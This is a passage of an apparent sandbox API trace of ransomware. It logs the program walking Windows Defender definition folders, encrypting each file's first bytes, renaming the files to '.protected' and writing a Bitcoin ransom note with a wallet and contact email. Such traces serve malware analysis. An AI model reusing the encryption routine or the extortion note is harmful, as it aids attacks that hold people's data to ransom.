us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.582] CloseHandle (hObject=0xd4) returned 1 [0071.583] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 103 [0071.583] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0071.583] lstrcmpW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 105 [0071.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.583] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\.") returned 105 [0071.583] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\..") returned 106 [0071.583] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.583] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="Windows") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="Program Files") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="Program Files (x86)") returned -1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="$Recycle.bin") returned 1 [0071.583] lstrcmpiW (lpString1="mpasbase.vdm", lpString2="System Volume Information") returned -1 [0071.583] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.583] StrStrIW (lpFirst="mpasbase.vdm", lpSrch=".protected") returned 0x0 [0071.583] lstrcmpW (lpString1="mpasbase.vdm", lpString2="RESTORE_FILES.txt") returned -1 [0071.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.583] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.584] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".txt") returned 0x0 [0071.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".rar") returned 0x0 [0071.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0071.584] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".zip") returned 0x0 [0071.584] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.586] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.586] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.587] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.587] CloseHandle (hObject=0xd8) returned 1 [0071.588] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected") returned 126 [0071.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.protected")) returned 1 [0071.588] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Windows") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Program Files") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="Program Files (x86)") returned -1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="$Recycle.bin") returned 1 [0071.588] lstrcmpiW (lpString1="mpasdlta.vdm", lpString2="System Volume Information") returned -1 [0071.588] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.588] StrStrIW (lpFirst="mpasdlta.vdm", lpSrch=".protected") returned 0x0 [0071.588] lstrcmpW (lpString1="mpasdlta.vdm", lpString2="RESTORE_FILES.txt") returned -1 [0071.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.588] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".txt") returned 0x0 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".rar") returned 0x0 [0071.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned 116 [0071.589] StrStrW (lpFirst="mpasdlta.vdm", lpSrch=".zip") returned 0x0 [0071.589] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.590] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.590] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.590] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.590] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.592] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.592] CloseHandle (hObject=0xd8) returned 1 [0071.592] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected") returned 126 [0071.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.protected")) returned 1 [0071.592] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Windows") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Program Files") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="Program Files (x86)") returned -1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="$Recycle.bin") returned 1 [0071.593] lstrcmpiW (lpString1="mpengine.dll", lpString2="System Volume Information") returned -1 [0071.593] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrIW (lpFirst="mpengine.dll", lpSrch=".protected") returned 0x0 [0071.593] lstrcmpW (lpString1="mpengine.dll", lpString2="RESTORE_FILES.txt") returned -1 [0071.593] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0071.593] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0071.593] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".txt") returned 0x0 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".rar") returned 0x0 [0071.593] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned 116 [0071.593] StrStrW (lpFirst="mpengine.dll", lpSrch=".zip") returned 0x0 [0071.593] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.595] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.595] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0071.596] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0071.596] CloseHandle (hObject=0xd8) returned 1 [0071.597] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected") returned 126 [0071.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpengine.dll.protected")) returned 1 [0071.597] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.597] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.597] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt") returned 121 [0071.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.599] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.599] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.599] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.599] CloseHandle (hObject=0xd4) returned 1 [0071.599] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.600] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.600] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt") returned 82 [0071.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.601] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.601] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.601] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.601] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.602] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.602] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.602] CloseHandle (hObject=0xb4) 